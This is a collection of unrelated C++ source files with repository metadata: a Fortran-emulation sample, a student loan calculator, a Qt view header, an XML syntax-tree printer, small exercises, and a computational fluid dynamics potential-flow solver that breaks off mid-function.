656e3c1c974e8988ac42be0022d739f143af05b9
|
refs/heads/master
| 2016-09-05T13:54:23.197073
| 2014-12-27T20:50:51
| 2014-12-27T20:50:51
| 28,546,046
| 2
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 735
|
cpp
|
string_array_fem.cpp
|
#include <fem.hpp> // Fortran EMulation library of fable module
namespace placeholder_please_replace {
using namespace fem::major_types;
using fem::common;
void
sub(
common& cmn,
str_arr_cref<> strings)
{
strings(dimension(star));
common_write write(cmn);
int i = fem::int0;
FEM_DO_SAFE(i, 1, 2) {
write(6, "(a)"), strings(i);
}
}
void
program_prog(
int argc,
char const* argv[])
{
common cmn(argc, argv);
arr_1d<2, fem::str<3> > strings(fem::fill0);
strings(1) = "Abc";
strings(2) = "dEF";
sub(cmn, strings);
}
} // namespace placeholder_please_replace
int
main(
int argc,
char const* argv[])
{
return fem::main_with_catch(
argc, argv,
placeholder_please_replace::program_prog);
}
|
b8bced93b216010eaa3aa6fec32a3fcb289fc565
|
cb366b5201a772d311d1a358cd488626e12a833f
|
/loanApplication/loanApplication/Source.cpp
|
c2a933594a673d3ea2e51473211c6587eb08a917
|
[] |
no_license
|
tjwmagic/loanApplication
|
0278d69aaebb2560f00e4ddd865ba69579b59c7a
|
a01b1d3d52f6eab9aeb3987800386e24037305fd
|
refs/heads/master
| 2021-01-01T06:25:40.487199
| 2017-07-24T01:57:15
| 2017-07-24T01:57:15
| 97,425,303
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,931
|
cpp
|
Source.cpp
|
#include <iostream>
#include <iomanip>
#include <string>
#include <cmath>
#include <math.h>
#include <stdio.h>
using namespace std;
void main() {
int mainMenu = 0;
double presentValue = 0;
double interestRate = 0;
double numberOfPeriods = 0;
double payment = 0;
double mathLoanPaymentTop = 0;
double mathLoanPaymentBottom = 0;
double mathLoanPaymentBottomRight = 0;
cout << "\nWhat would you like to do:\n";
cout << "\n1. Find monthly payment";
cout << "\n2. Loan Amount";
cout << "\n3. Interest rate\n";
cin >> mainMenu;
switch (mainMenu) {
default:
cout << "Invalid option" << endl;
case 1:
cout << "\nYou chose FIND MONTHLY PAYMENT";
cout << "\nTo find your payment, please enter the following: " << endl;
cout << "\nPresent Value: ";
cin >> presentValue;
cout << "\nInterest Rate: ";
cin >> interestRate;
cout << "\n Number of periods: ";
cin >> numberOfPeriods;
interestRate = interestRate * 0.01;
cout << "\n\n";
cout << "Interest Rate: " << interestRate << endl;
cout << "Present Value: " << presentValue << endl;
cout << "Number of Periods: " << numberOfPeriods << endl;
cout << "\n\n";
//Something is wrong here. The math isn't coming out correct.
mathLoanPaymentTop = interestRate * presentValue;
mathLoanPaymentBottomRight = 1 + interestRate;
mathLoanPaymentBottom = 1 * mathLoanPaymentBottomRight;
presentValue = mathLoanPaymentTop / mathLoanPaymentBottom;
cout << "Loan Payment Top: " << mathLoanPaymentTop << endl;
cout << "Loan Payment Right: " << mathLoanPaymentBottomRight << endl;
cout << "Loan Payment Bottom: " << mathLoanPaymentBottom << endl;
//presentValue = interestRate (presentValue) / 1 - (1 + interestRate);
break;
case 2:
cout << "\You chose LOAN AMOUNT";
break;
case 3:
cout << "\nYou chose INTERET RATE";
break;
}
cout << "\n\nEnd switch\n\n";
system("pause");
}
|
4b317ec50717a72cfe1589eb41722de6c3646ac8
|
1d4204c6766449214544a6511e138782712c0806
|
/Src/Simulation/ODESimulation/SimulationCore/Controller/DirectView.h
|
251363b97f097be28e8c9cc61929ff62d7f5d59a
|
[] |
no_license
|
spyfree/tjNaoBackup
|
2d0291a83f8473346546567ae7856634f6c5a292
|
0c7dd47f65e23be6e9d82a31f15ef69a3ce386cb
|
refs/heads/master
| 2016-09-06T08:20:52.068351
| 2014-01-31T03:33:19
| 2014-01-31T03:33:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,414
|
h
|
DirectView.h
|
/**
* @file Controller/DirectView.h
*
* Declaration of class DirectView
*
* @author Colin Graf
*/
#ifndef __DIRECTVIEW_H__
#define __DIRECTVIEW_H__
#include "../Controller/View.h"
class QWidget;
/**
* The class is the base class for direct views, i.e. views that have their own widget.
*/
class DirectView : public View
{
public:
/**
* The method returns a new instance of a widget for this direct view.
* The caller has to delete this instance. (Qt handles this)
* @return The widget.
*/
virtual QWidget* createWidget() { return 0; }
/**
* The function is called to let the direct view update the widget. Do so if necessary.
* @param widget The widget
*/
virtual void updateWidget(QWidget& widget) {}
/**
* The function is called to return a string that contains the configuration of the widget/view.
* @param widget The widget
* @return A text string containing all information to restore the internal state of the widget/view.
*/
virtual std::string getConfiguration(QWidget& widget) const {return "";}
/**
* The function is called to restore the configuration of the widget/view.
* @param widget The widget
* @param A text string containing all information to restore the internal state of the widget/view.
*/
virtual void setConfiguration(QWidget& widget, const std::string& configuration) {}
};
#endif
|
7d01add92aab275f7bc17f7d9bcf07348d64777f
|
50fa9cfbd4d4d5efa56bfeaf7bef6a6d2d384606
|
/201401145_Assignment3/Classes.cpp
|
44da44ddea58d4eaca64991cb04765d6a9048921
|
[
"MIT"
] |
permissive
|
hkveeranki/Compilers
|
96fecb8be03e4581c272eb33ccdf0b6af195461e
|
97e1b26bdea4b31f7bdfbee209dce72e50de7e0b
|
refs/heads/master
| 2021-06-07T11:39:31.454351
| 2016-10-13T05:49:19
| 2016-10-13T05:49:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 4,973
|
cpp
|
Classes.cpp
|
#include <bits/stdc++.h>
#include "ClassDefs.h"
using namespace std;
ofstream out("XML_vistor.txt");
int tabs_needed = 0;
const int tab_width = 4;
#define TBS printTabs()
/* Usefull Functions */
string getOperation(string opr){
if(opr.compare("+") == 0){
return string("Addition");
}
else if (opr.compare("-") == 0){
return string("Subtraction");
}
else if(opr.compare("*") == 0){
return string("Multiplication");
}
else if (opr.compare("/") == 0){
return string("Division");
}
else if (opr.compare("%") == 0){
return string("Modulus");
}
}
void printTabs(){
for(int i = 0; i < tabs_needed; i++){
for(int j = 0; j < tab_width; j++)
out << " ";
}
}
/* Constructors */
Var::Var(string declType, string name, unsigned int length){
this->declType = declType;
this->name = name;
this->length = length;
}
Var::Var(string declType, string name){
this->declType = declType;
this->name = name;
}
Decl::Decl(string dataType, class Var* var){
this->dataType = dataType;
this->var = var;
this->var->setDataType(dataType);
}
Decls::Decls(){
this->cnt = 0;
}
Location::Location(string var, string location_type, class Expr* expr){
this->var = var;
this->location_type = location_type;
this->expr = expr;
this->etype = exprType::location;
}
Location::Location(string var,string location_type){
this->var = var;
this->location_type = location_type;
this->etype = exprType::location;
}
intLiteral::intLiteral(int value){
this->value = value;
this->ltype = literalType::Int;
}
boolLiteral::boolLiteral(string value){
this->value = value;
this->ltype = literalType::Bool;
}
BinExpr::BinExpr(class Expr* lhs,string opr,class Expr* rhs){
this->lhs = lhs;
this->rhs = rhs;
this->opr = opr;
this->etype = exprType::binary;
}
EnclExpr::EnclExpr(class Expr* expr){
this->expr = expr;
this->etype = exprType::enclExpr;
}
Assignment::Assignment(class Location* loc,class Expr* expr){
this->loc = loc;
this->expr = expr;
}
Stmts::Stmts(){
this->cnt = 0;
}
Prog::Prog(class Decls* decls,class Stmts* stmts){
this->decls = decls;
this->stmts = stmts;
}
/* Methods */
void Var::setDataType(string datatype){
this->dataType = datatype;
}
class Var* Decl::getVar(){
return var;
}
void Decls::push_back(class Decl* var){
decl_list.push_back(var);
cnt++;
}
void Stmts::push_back(class Stmt* stmt){
stmts.push_back(stmt);
cnt++;
}
string BinExpr::toString(){
return lhs->toString() + opr + rhs->toString();
}
string EnclExpr::toString(){
return expr->toString();
}
string Location::toString(){
if(location_type.compare("Number") == 0){
return var;
}
else{
return var+ "[" + expr->toString() + "]";
}
}
int intLiteral::getValue(){
return value;
}
string intLiteral::toString(){
return to_string(value);
}
string boolLiteral::toString(){
return value;
}
string Location::getVar(){
return var;
}
bool Location::is_array(){
return location_type.compare("Array") == 0;
}
class Expr* Location::getExpr(){
return expr;
}
/* Traversals */
void Decls::traverse(){
TBS;
out << "<declarations count=\"" << cnt << "\">\n";
tabs_needed++;
for (int i = 0; i < decl_list.size(); i++){
decl_list[i]->traverse();
}
tabs_needed--;
TBS;
out << "</declarations>\n";
}
void Decl::traverse(){
var->traverse();
}
void Var::traverse(){
TBS;
out << declType << endl;
TBS;
out << "<declaration name=\"" << name << "\" type=\"" << dataType << "\" ";
if(declType.compare("Array") == 0){
out << "size=\"" << length << "\" ";
}
out << "/>\n";
}
void Stmts::traverse(){
TBS;
out << "<statements count=\"" << cnt << "\">\n";
tabs_needed++;
for(int i = 0; i < stmts.size(); i++){
stmts[i]->traverse();
}
tabs_needed--;
TBS;
out << "</statements>\n";
}
void Assignment::traverse(){
TBS;
out << "<assignment>\n";
tabs_needed++;
TBS;
out << "<LHS name =\"" << loc->getVar() << "\">\n";
if(loc->is_array()){
tabs_needed++;
loc->getExpr()->traverse();
tabs_needed--;
}
TBS;
out << "</LHS>\n";
TBS;
out << "<RHS>\n";
tabs_needed++;
expr->traverse();
tabs_needed--;
TBS;
out << "</RHS>\n";
tabs_needed--;
TBS;
out << "</assignment>\n";
}
void Location::traverse(){
TBS;
out << "<identifier name=\"" << var << "\"";
if(is_array()){
out << ">\n";
tabs_needed++;
expr->traverse();
tabs_needed--;
TBS;
out << "</identifier>\n";
}
else{
out << " />\n";
}
}
void intLiteral::traverse(){
TBS;
out << "<integer value=\"" << value << "\" />\n";
}
void boolLiteral::traverse(){
TBS;
out << "<boolean value=\"" << value << "\" />\n";
}
void EnclExpr::traverse(){
TBS;
expr->traverse();
}
void BinExpr::traverse(){
TBS;
out << "<binary_expression type=\"" << getOperation(opr) <<"\">\n";
tabs_needed++;
lhs->traverse();
rhs->traverse();
tabs_needed--;
TBS;
out << "</binary_expression>\n";
}
void Prog::traverse(){
TBS;
out << "<program>\n";
tabs_needed++;
decls->traverse();
stmts->traverse();
tabs_needed--;
TBS;
out << "</program>\n";
}
|
daff9db684a9d90444fa533ecc90675f27c8624b
|
9c76fc54e0a5d45ef96f117b618392c6c1ca9245
|
/main.cpp
|
4feb3a03ca76e9ecfd025c5c1abb74ebb0e4fd1f
|
[] |
no_license
|
domacikolaci/textAdventure
|
175d4ee918fe582a9d3d344f24b4817cd4606e60
|
7daee8fb17fec962c182876de2a5e9c774f354b8
|
refs/heads/master
| 2021-01-10T12:17:08.435279
| 2015-11-26T03:01:42
| 2015-11-26T03:01:42
| 45,451,343
| 0
| 1
| null | 2015-11-25T05:07:25
| 2015-11-03T08:12:32
|
C++
|
UTF-8
|
C++
| false
| false
| 525
|
cpp
|
main.cpp
|
#include <iostream>
#include "player.h"
#include "enemyGoblin.h"
#include "level1.h"
/*
TODO:
-Make level 1
-Make basic enemy
-Make combat system
-Make player stats
--Make HP
--Make Damage system
--Make classes
*/
using namespace std;
int main()
{
string answerGameStart;
cout << "Hello Are you ready to set off on an adventure?" << endl;
cin >> answerGameStart;
player player;
if (answerGameStart == "yes")
{
player;
}
else
{
cout << "riiiiip" << endl;
}
}
|
b76d551f94db0f835f47bf95b249499d3247809e
|
f1afafe4bffbe72836bd11f8eef16795ecf89d31
|
/src/headers/point.h
|
da1e9cdb62aa99c9d15c335543ce24b812da98ad
|
[
"Apache-2.0",
"LGPL-2.0-or-later",
"LGPL-2.1-or-later",
"GPL-3.0-only",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
ahmed-debbech/snaykie
|
d27909af72a2e282f801c64cdc2dd84ab424eb36
|
40beb335b63c6e51bc256fe8f063fc674dbd367d
|
refs/heads/master
| 2020-08-08T04:59:02.248599
| 2020-01-17T10:52:48
| 2020-01-17T10:52:48
| 213,722,472
| 2
| 0
|
Apache-2.0
| 2019-12-22T15:02:08
| 2019-10-08T18:36:08
|
C++
|
UTF-8
|
C++
| false
| false
| 455
|
h
|
point.h
|
#ifndef POINT_H
#define POINT_H
#include <iostream>
#include "SDL/SDL_image.h"
#include "SDL/SDL.h"
#include "SDL/SDL_mixer.h"
#include "SDL/SDL_ttf.h"
#include "board.h"
using namespace std;
class point{
int num_point_on_board;
SDL_Surface * pointImg;
SDL_Rect pointPos;
public:
point(board &);
int getPointNum(){return this->num_point_on_board;}
void showPoint(SDL_Surface*);
SDL_Rect get_xy_point_on_map(board &);
~point();
};
#endif
|
f7b1ace62622a0caae2f720e1aeb4aa9eed5175a
|
791074b3de80286e3581c0f2a68852e5725e274e
|
/Digit_Programes/6.1.cpp
|
d09cf0b2c5505ca1e7e0dba2b1d547737f5e6ee1
|
[] |
no_license
|
PhuleArti/CPP
|
3ac760f59a39439b2150f97040e473aafc24267e
|
b9cbf57c9f9890189d3cd29c3642a49a0d7378af
|
refs/heads/main
| 2023-08-14T12:06:01.906115
| 2021-09-25T08:18:44
| 2021-09-25T08:18:44
| 385,575,534
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 910
|
cpp
|
6.1.cpp
|
/*
problem statement:Write a program which accept number from user and display its digits in reverse
order.
*/
using namespace std;
#include<iostream>
class Display
{
public:
int no1;
public:
int RevDigit(int no1)
{
int Digit=0;
int Rev=0;
if(no1<0)
{
no1=-no1;
}
while(no1!=0)
{
Digit = no1 % 10;
Rev = Rev *10 + Digit;
no1 = no1 / 10;
}
return Rev;
}
};
int main()
{
int value1=0;
int ret=0;
cout<<"enter number"<<"\n";
cin>>value1;
Display obj1;
ret=obj1.RevDigit(value1);
cout<<"reverse digits of given number are:"<<ret<<"\n";
}
|
88abcb65b88a9cccbc38d6d2283776e2b1a0fe5b
|
8f84b0a8c966465769e39e215819de93ca47658e
|
/codeforces.com/problemset/problem/1038/B/code.cpp
|
9ac6e3b6ba614b983e92fc577c673a2c1b92527e
|
[] |
no_license
|
Louhc/code
|
bc04c2d67b3401db36bd750ac902e0497fe2f12f
|
3903212ed33936be8cf9d6e3f685bb32b3ea8cf2
|
refs/heads/master
| 2020-09-01T08:11:02.525687
| 2020-06-17T09:03:14
| 2020-06-17T09:03:14
| 218,916,443
| 0
| 1
| null | 2019-11-01T05:03:39
| 2019-11-01T05:03:39
| null |
UTF-8
|
C++
| false
| false
| 791
|
cpp
|
code.cpp
|
#include<bits/stdc++.h>
using namespace std;
inline bool cmin( int &x, int y ){ return x > y ? x = y, 1 : 0; }
inline bool cmax( int &x, int y ){ return x < y ? x = y, 1 : 0; }
#define fp( i, b, e ) for ( int i(b), I(e); i <= I; ++i )
#define fd( i, b, e ) for ( int i(b), I(e); i >= I; --i )
#define go( i, b ) for ( int i(b), v(to[b]); i; v = to[i = nxt[i]] )
#define i64 long long
const int _ = 1e5 + 55;
int N;
int main(){
scanf( "%d", &N );
if ( ((N * (N + 1)) & 3) == 0 ){
printf("Yes\n");
printf("1 2\n");
printf( "%d %d ", N - 1, 1 );
fp( i, 3, N ) printf( "%d ", i );
} else if ( N > 2 ) {
int t = N % 2 == 0 ? N / 2 : N;
printf("Yes\n");
printf("%d %d\n%d ", 1, t, N - 1 );
fp( i, 1, N ) if ( i != t ) printf( "%d ", i );
} else printf( "No\n" );
return 0;
}
|
035b252604c09db8b381e7933edc4ffecc6159e7
|
4b87c954527d46c63524aa16ddfb498d435c97f4
|
/cfd/src/main.cpp
|
a309272313fa431d0074fbc6ae4061706053d6b3
|
[] |
no_license
|
tectronics/ps3hacking
|
a317ed1131b003b694e81b128dbbc8861ec7c96b
|
9500b05c5c21265f40f96b594fa911678e985caa
|
refs/heads/master
| 2018-01-11T15:02:34.290227
| 2009-07-18T14:35:17
| 2009-07-18T14:35:17
| 46,858,056
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 15,411
|
cpp
|
main.cpp
|
#include <stdio.h>
#include <vector>
#include <malloc.h>
#include <cmath>
#include <rapidmind/platform.hpp>
#include <rapidmind/shortcuts.hpp>
using namespace rapidmind;
using namespace std;
class No{
public:
double x,y,phi,delta,velocidade;
No(double x, double y){
this->x = x;
this->y = y;
}
};
enum Metodo { Jacobi, GaussSeidel, SOR, LineGaussSeidel, SLOR };
Timer timerStart, timerEnd;
//estrutura utilizada para armazenar uma malha 2d de nos
//o construtor espera uma equacao da forma a x^2 + b x + c = 0
//para que todos os pontos menores que estes nao sejam incluidos na malha
class Malha{
private:
int ILE,ITE,IMAX,JMAX;
double XSF,YSF, t, Uinf, eps, relaxacaoSor;
int count;
vector< vector <No> > nos;
vector< No > contorno;
vector< double > historicoResiduo;//em log na base 10
vector< double > cpAerofolio; //calculo do cP apenas no aerofolio
void construirMalha(){
nos = vector< vector <No> >(IMAX+1, vector<No>(JMAX+1, No(0.0,0.0) )) ;
contorno = vector< No >(IMAX+1,No(0.0,0.0));
cpAerofolio = vector < double > (ITE - ILE +1, 0.0);
for(int i=1; i<=IMAX;i++){
for(int j=1;j<=JMAX;j++){
printf("%lf %lf\n", nos[i][j].x, nos[i][j].y);
}
}
double deltaX = 1.0/ (ITE-ILE);
printf("%lf %d %d\n", deltaX, ITE, ILE);
printf("%d ", ITE);
printf("%d\n", ILE);
//note que deve-se primeiro preencher de ILE a ITE
//pois os outros preenchimentos sao dependentes deste
for(int i=ILE;i<=ITE;i++){
for(int j=1;j<=JMAX;j++){
nos[i][j].x = (i-ILE)* deltaX;
printf("%lf\n", nos[i][j].x);
}
}
printf("%lf %d %d", deltaX, ITE, ILE);
for(int i=ITE+1;i<=IMAX;i++){
for(int j=1;j<=JMAX;j++){
nos[i][j].x = nos[i-1][j].x + ( nos[i-1][j].x - nos[i-2][j].x)*XSF;
printf("[%d][%d] %lf\n", i, j, nos[i][j].x);
}
}
//tomar o cuidado de preencher da direita para a esquerda
for(int i=ILE-1;i>=1;i--){
for(int j=1;j<=JMAX;j++){
nos[i][j].x = nos[i+1][j].x + ( nos[i+1][j].x - nos[i+2][j].x)*XSF;
}
}
//malha em y
for(int i=1; i<=IMAX; i++){
nos[i][1].y= -deltaX/2.0;
nos[i][2].y= deltaX/2.0;
printf("%lf %lf\n", nos[i][1].y, nos[i][2].y);
}
for(int i=1; i<=IMAX;i++){
for(int j=3;j<=JMAX;j++){
nos[i][j].y= nos[i][j-1].y + (nos[i][j-1].y- nos[i][j-2].y)*YSF;
printf("[%d][%d] %lf\n", i, j, nos[i][j].y);
}
}
imprimirMalha();
imprimirAerofolio();
}
//as condicoes iniciais serao da forma phiInf = Uinf*x
void aplicarCondicoesIniciais(){
printf("WPHI\n");
for(int i=1;i<=IMAX; i++){
for(int j=1;j<=JMAX;j++){
nos[i][j].phi = Uinf*nos[i][j].x;
printf("[%d][%d] %lf\n", i, j, nos[i][j].phi);
}
}
printf("CONTORNO\n");
for(int i=1;i<=IMAX;i++){
//para j=1.5, temos informacao sobre dphidy
if((i<ILE)||(i>ITE)){
//condicao de simetria do escoamento para alpha=0
contorno[i].phi=0.0;
printf("%d %lf\n", i, contorno[i].phi);
}
else{
//no perfil/corda temos que
//dphidy = Uinf * dy/dx
//dy/dx = 2t - 4tx
//note que poderiamos pegar qualquer j para nos[i][1].x
//visto que x eh constante na direcao y
contorno[i].phi=Uinf* (2*t - 4*t*nos[i][1].x);
printf("%d %lf\n", i, contorno[i].phi);
}
}
}
void aplicarDeltas(){
for(int j=2;j<JMAX;j++){
for(int i=2;i<IMAX;i++){
nos[i][j].phi += nos[i][j].delta;
}
}
}
//os metodos Jacobi, GaussSeidel e SOR serao iterados na direcao y
bool iterarDirecaoY(Metodo metodo){
bool terminou = true;
//observar nao iterar no contorno
double resMax = 0;
for(int j=2;j<JMAX;j++){
for(int i=2;i<IMAX;i++){
double N;
//conforme definido na handout4
double deltaX = (nos[i+1][j].x - nos[i-1][j].x)/2.0;
double deltaY = (nos[i][j+1].y - nos[i][j-1].y)/2.0;
double Lij = 2.0/(nos[i+1][j].x-nos[i-1][j].x)*
((nos[i+1][j].phi-nos [i] [j].phi)/(nos[i+1][j].x-nos[i][j].x)-
((nos[i] [j].phi-nos[i-1][j].phi)/(nos[i][j].x-nos[i-1][j].x))
)+
2.0/(nos[i][j+1].y-nos[i][j-1].y)*
( (nos[i][j+1].phi-nos[i][j].phi)/(nos[i][j+1].y-nos[i][j].y)-
((nos[i][j].phi - nos[i][j-1].phi)/(nos[i][j].y-nos[i][j-1].y))
);
if(fabs(Lij)>resMax){
resMax = fabs(Lij);
}
//printf("%+.9lf ",Lij);
switch(metodo){
case Jacobi:
N = -2.0/(deltaX*deltaX) -2.0/(deltaY*deltaY);
nos[i][j].delta = -Lij/N;
break;
case GaussSeidel:
N = -2.0/(deltaX*deltaX) -2.0/(deltaY*deltaY);
nos[i][j].delta = (-Lij-nos[i-1][j].delta-nos[i][j-1].delta)/N;
break;
case SOR:
double r = relaxacaoSor;
N = -(2.0/r)/(deltaX*deltaX) -(2.0/r)/(deltaY*deltaY);
nos[i][j].delta = (-Lij-nos[i-1][j].delta-nos[i][j-1].delta)/N;
break;
}
if((terminou)&&(fabs(Lij)>=1.0e-8)){
// printf("Ainda nao (%d,%d) %.30lf\n",i,j,fabs(Lij/N));
terminou = false;
}
}
}
aplicarDeltas();
double log10Res = log(resMax)/log(10);
historicoResiduo.push_back(log10Res);
//printf("\n");
return terminou;
}
bool iterarDirecaoX(Metodo metodo){
// malha(a,b,c,d) indiceMalha
// contorno(n+2) JMAX
// n+1 ...
// n ...
// ... ...
// ... ...
// 2 2
// contorno(1) 1
double resMax = 0;
bool terminou = true;
vector <double> a = vector< double >(JMAX+1, 0.0) ;
vector <double> b = vector< double >(JMAX+1, 0.0) ;
vector <double> c = vector< double >(JMAX+1, 0.0) ;
vector <double> d = vector< double >(JMAX+1, 0.0) ;
vector <double> as = vector< double >(JMAX-1, 0.0) ;
vector <double> bs = vector< double >(JMAX-1, 0.0) ;
vector <double> cs = vector< double >(JMAX-1, 0.0) ;
vector <double> ds = vector< double >(JMAX-1, 0.0) ;
vector <double> x = vector< double >(JMAX-1, 0.0) ;
for(int i=2;i<IMAX;i++){
//for(int j=2;j<JMAX;j++){
int n = JMAX-2;//iteracao vai para j de 2 a n+1(JMAX-1), para i de 2 a (IMAX-1)
double Li2,Lin1,deltaX,deltaY;
for(int j = 2;j<= JMAX-1;j++){
double Lij = 2.0/(nos[i+1][j].x-nos[i-1][j].x)*
((nos[i+1][j].phi-nos [i] [j].phi)/(nos[i+1][j].x-nos[i][j].x)-
((nos[i] [j].phi-nos[i-1][j].phi)/(nos[i][j].x-nos[i-1][j].x))
)+
2.0/(nos[i][j+1].y-nos[i][j-1].y)*
( (nos[i][j+1].phi-nos[i][j].phi)/(nos[i][j+1].y-nos[i][j].y)-
((nos[i][j].phi - nos[i][j-1].phi)/(nos[i][j].y-nos[i][j-1].y))
);
if(fabs(Lij)>resMax){
resMax = fabs(Lij);
}
//conforme definido na handout4
deltaX = (nos[i+1][j].x - nos[i-1][j].x)/2.0;
deltaY = (nos[i][j+1].y - nos[i][j-1].y)/2.0;
double r=0.0;
if(metodo==LineGaussSeidel)
r = 1.0;
else
r = relaxacaoSor;
a[j] = (2/r)/((nos[i][j].y-nos[i][j-1].y)* (nos[i][j+1].y - nos[i][j-1].y));
b[j] = -(2/r)/(deltaX*deltaX) - (2/r)/((nos[i][j+1].y - nos[i][j].y)*(nos[i][j+1].y - nos[i][j-1].y)) - (2/r)/((nos[i][j].y-nos[i][j-1].y)* (nos[i][j+1].y - nos[i][j-1].y));
c[j] = (2/r)/((nos[i][j+1].y - nos[i][j].y)*(nos[i][j+1].y - nos[i][j-1].y));
d[j] = -Lij - nos[i-1][j].delta/(deltaX*deltaX);
if(j==2) Li2=Lij;
if(j==n+1) Lin1 = Lij;
}
//d[2] e d[n+1] sao casos especiais
d[2] = -Li2 - nos[i-1][2].delta/(deltaX*deltaX) - a[2] * nos[i][1].delta;
d[n+1] = -Lin1 - nos[i-1][n+1].delta/(deltaX*deltaX) - c[n+1] * nos[i][n+2].delta;
//poderiamos tambem dizer que
a[2] = 0, c[n+1] = 0;
for(int w=2;w<=n+1;w++){
as[w-1]= a[w];
bs[w-1]= b[w];
cs[w-1]= c[w];
ds[w-1]= d[w];
}
tridiag(as,bs,cs,ds,x);
/*
if(i==2){
for(int w=1;w<=n;w++)
printf("delta(j %d) %lf\n",w,x[w]);
}*/
for(int w=1;w<=n;w++){
nos[i][w+1].delta = x[w];
}
}
double log10Res = log(resMax)/log(10);
historicoResiduo.push_back(log10Res);
aplicarDeltas();
return false;//terminou;
}
//faz a iteracao na malha conforme metodo
bool iterarMalha(Metodo metodo){
bool terminou = true;
aplicarCondicoesDeContorno();
switch (metodo){
case Jacobi:
case GaussSeidel:
case SOR:
terminou = iterarDirecaoY(metodo);
break;
case LineGaussSeidel:
case SLOR:
terminou = iterarDirecaoX(metodo);
break;
}
return terminou;
}
//aplica as condicoes de contorno nas
//fronteiras de entrada, saida, superior e inferior
void aplicarCondicoesDeContorno(){
//a condicao de contorno nas fronteiras de entrada,
//saida e superior sao iguais as condicoes iniciais,
//portanto, somente a fronteira inferior sera atualizada
//contornos esquerdo e direito
/**ITERAR CONTORNO*/
printf("ITERAR CONTORNO\n");
for(int j=1;j<=JMAX;j++){
nos[1][j].delta = 0;
nos[IMAX][j].delta = 0;
}
//contorno superior
for(int i=1;i<=IMAX;i++){
nos[i][JMAX].delta = 0;
}
//Conforme a lista, o perfil esta sendo representado
//por sua corda e temos que:
//phi(i,1) = phi(i,2)-(y2-y1)dphidy(i,3/2)
//lembrando que o y em 3/2 vale zero, pois
//y(3/2) = (y(1)+y(2))/2 = 0/2 = 0
//y2-y1 = deltaX
double deltaX = 1.0/(ITE-ILE);
printf("DX %lf\n", deltaX);
/**ITERAR RESTO*/
printf("ITERAR RESTO %d\n", count);
for(int i=1;i<=IMAX;i++){
//lembrando que contorno[i].phi = dphidy, por construcao
//TODO: confirmar se nos[i][2] eh realmente da iteracao anterior,
//como esta sendo feito aqui
double delta = nos[i][2].phi - ((deltaX) * contorno[i].phi) - nos[i][1].phi;
printf("PHI = %lf DX = %lf CONT = %lf PHI = %lf\n", nos[i][2].phi, deltaX, contorno[i].phi, nos[i][1].phi);
nos[i][1].delta = delta;
nos[i][1].phi +=delta;
printf("%d %lf %lf\n", i, nos[i][1].delta, nos[i][1].phi);
//printf("Mydelta %lf\n",delta);
//nos[i][1].phi += delta;
}
}
double getEpsilonMaquina(){
double eps = 1.0;
do{
printf("%.30lf\n",eps);
eps = eps/2.0;
}while( (double)(1.0 + eps/2.0)!=1.0);
return eps;
}
public:
Malha(int ILE, int ITE, int IMAX, int JMAX, double XSF, double YSF,
double t, double Uinf){
this->ILE = ILE; this->ITE = ITE; this->IMAX = IMAX;
this->JMAX = JMAX; this->XSF = XSF; this->YSF = YSF;
this->t = t, this->Uinf=Uinf;
construirMalha();
}
//assumindo a[1]=0
void tridiag(vector<double> a, vector<double> b,vector<double> c,vector<double> d,
vector<double>& x){
int n = a.size()-1;
//vector<double> bl = vector<double> (n+1,0.0);
//vector<double> dl = vector<double> (n+1,0.0);
for(int k=2;k<=n;k++){
double m = a[k]/b[k-1];
b[k] = b[k] - m*c[k-1];
d[k] = d[k] - m*d[k-1];
//printf("bl(%d) %lf dl(%d) %lf\n",k,b[k],k,d[k]);
}
x[n] = d[n]/b[n]; //verificar se eh b ou bl
for(int k=n-1;k>=1;k--){
x[k]= (d[k] - c[k]*x[k+1])/b[k]; //verificar se eh bk ou bkl
}
return;
}
void imprimirAerofolio(){
FILE* faero = fopen("aero.dat","w");
for(int i=0;i<50;i++){
double x = i/50.0;
double a = -2*t, b = 2*t,c=0;
double y = a*x*x+b*x+c;
fprintf(faero,"%lf %lf\n",x,y);
}
fclose(faero);
}
void imprimirMalha(){
FILE* fmalha = fopen("malha.dat","w");
for(int j=1;j<=JMAX;j++){
for(int i=1;i<=IMAX;i++){
fprintf(fmalha,"%+5.3lf %+5.3lf\n",nos[i][j].x, nos[i][j].y);
}
}
fclose(fmalha);
}
void imprimirPotenciais(const char* nomeDoArquivo){
FILE* fpotencial = fopen(nomeDoArquivo,"w");
for(int j=1;j<=JMAX;j++){
for(int i=1;i<=IMAX;i++){
fprintf(fpotencial,"%+5.5lf %+5.5lf %+5.5lf\n",nos[i][j].x, nos[i][j].y,nos[i][j].phi);
}
fprintf(fpotencial,"\n");
}
fclose(fpotencial);
}
void imprimirResiduo(const char* nomeDoArquivo){
FILE* fresiduo = fopen(nomeDoArquivo,"w");
for(int i=0;i<historicoResiduo.size();i++){
fprintf(fresiduo,"%d %lf\n",i+1,historicoResiduo[i]);
}
fclose(fresiduo);
}
void imprimirCoeficientesDeVelocidade(const char* nomeDoArquivo){
FILE* fCoeficientes = fopen(nomeDoArquivo,"w");
for(int j=2;j<JMAX;j++){
for(int i=2;i<IMAX;i++){
fprintf(fCoeficientes,"%+5.5lf %+5.5lf %+5.5lf\n",nos[i][j].x, nos[i][j].y,nos[i][j].velocidade);
}
fprintf(fCoeficientes,"\n");
}
fclose(fCoeficientes);
}
void imprimirCoeficientesDePressao(const char* nomeDoArquivo){
FILE* fCoeficientes = fopen(nomeDoArquivo,"w");
for(int j=2;j<JMAX;j++){
for(int i=2;i<IMAX;i++){
double cp = 1 - (nos[i][j].velocidade*nos[i][j].velocidade/(Uinf*Uinf));
fprintf(fCoeficientes,"%+5.5lf %+5.5lf %+5.5lf\n",nos[i][j].x, nos[i][j].y,cp);
}
fprintf(fCoeficientes,"\n");
}
fclose(fCoeficientes);
}
void setRelaxacaoSor(double val){
relaxacaoSor = val;
}
void calcularVelocidades(){
for(int j=2;j<JMAX;j++){
for(int i=2;i<IMAX;i++){
double vx = (nos[i+1][j].phi - nos[i-1][j].phi)/(nos[i+1][j].x - nos[i-1][j].x);
double vy = (nos[i][j+1].phi - nos[i][j-1].phi)/(nos[i][j+1].y - nos[i][j-1].y);
